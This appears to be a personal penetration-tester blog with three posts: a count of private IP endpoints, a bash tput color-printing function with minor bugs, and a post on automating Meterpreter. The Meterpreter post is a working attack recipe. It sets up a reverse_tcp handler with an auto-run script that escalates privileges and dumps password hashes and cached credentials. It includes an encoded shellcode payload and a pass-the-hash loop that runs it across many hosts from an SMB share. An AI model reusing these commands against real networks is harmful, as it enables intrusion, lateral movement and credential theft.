Number of Potential Ports in Private IP Space

So this is kind of interesting and it might be useful in the future.

The 10/8 network has 16,777,216 addresses

The 172.16/12 network has 1,048,576 addresses

The 192.168/16 network has 65,536 addresses

Combine those with 65,536 port numbers for TCP and the same for UDP and you get over 2.3 trillion (2,345,052,143,616) potential service endpoints.

So next time someone wants you to scan their private IP space, doesnt tell you what ranges there are and expects you to do it in 2 weeks, tell them to politely fuck off.

echo colored text in bash

Lots of tutorials tell you to use the "echo -e [blahblah" ANSI escape sequences to generate the colors for output. First of all those are practically impossible to read easily, they look like magic, and its a bitch to try to find a typo.

tput was created a while ago to remedy those issues. I've created a function/script that can be included in other scripts to easily generate colors.

#!/bin/bash
echo_color() {
 case ${1} in
 black)
  shift 1
  #echo $(COLOR)${user-supplied-text}$(NORMAL-COLOR)
  echo $(tput setaf 0)${*}$(tput sgr0)
  ;;
 red)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  ;;
 green)
  shift 1
  echo $(tput setaf 2)${*}$(tput sgr0)
  ;;
 yellow)
  shift 1
  echo $(tput setaf 3)${*}$(tput sgr0)
  ;;
 blue)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  ;;
 cyan)
  shift 1
  echo $(tput setaf 6)${*}$(tput sgr0)
  ;;
 magenta)
  shift 1
  echo $(tput setaf 5)${*}$(tput sgr0)
  ;;
 white)
  shift 1
  echo $(tput setaf 7)${*}$(tput sgr0)
  ;;
 underline)
  #yes i know its not a color, its still usefull though.
  shift 1
  echo $(tput setaf smul)${*}$(tput sgr0)
  ;;
 custom)
  color_code=${2}
  shift 2
  echo $(tput setaf ${color_code})${*}$(tput sgr0)
  ;;
 ls-color-codes)
  for i in $(seq 0 256); do 
  tput setaf ${i}
  printf " %3s" "$i"
  tput sgr0
  if [ $((($i + 1) % 16)) == 0 ] ; then
   echo #New line
  fi
  done 
  ;;
 *)
  cat <
This script will echo your text as a specified color.

Usage:
 $0
 $0 custom
 $0 ls-color-codes
USAGE
 esac
}
echo_color $*

I'm particularly happy with my ls-color-codes argument, it will print a 16x16 box of the color codes and their colors.

Happy scripting!

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...


Generate the post-exploitation comand rc file:

cat > /root/automsf.rc

getsystem

run post/windows/gather/smart_hashdump

run post/windows/gather/cachedump

exit

Then run msfconsole to listen for the callback:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 10.10.10.10

set AutoRunScript multi_console_command -rc /root/automsf.rc

expoit -j -z

 Then generate the payload to use with sce:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.1.1.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

 Then run the forloop while serving sce from a share

for i in `cat file-of-smb-hosts`; do 

echo grabbing $i; 

winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\10.10.10.10\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 

done

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto loads the rest of the payload, executes the .rc file, and exists. Rinse and repeat with the next IP